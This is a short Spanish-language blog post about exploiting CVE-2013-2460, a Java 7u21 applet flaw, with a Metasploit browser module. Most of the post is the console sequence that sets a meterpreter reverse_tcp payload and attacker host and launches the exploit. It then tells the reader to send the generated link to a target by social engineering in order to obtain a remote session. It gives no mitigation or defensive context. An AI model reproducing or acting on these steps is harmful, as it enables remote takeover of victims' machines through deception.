CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method

CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method

Java Applet ProviderSkeleton Insecure Invoke Method este módulo de Metasploit abusa el método inseguro invoke()  de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.

Explotando CVE-2013-2460 con mestasploit: 

msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]
msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]
msf exploit(java_jre17_provider_skeleton) > set uripath /
msf exploit(java_jre17_provider_skeleton) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Posted By César Calderón

Amante de todo lo relacionado con la informática, GNU/Linux, Programador, Geek. Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores.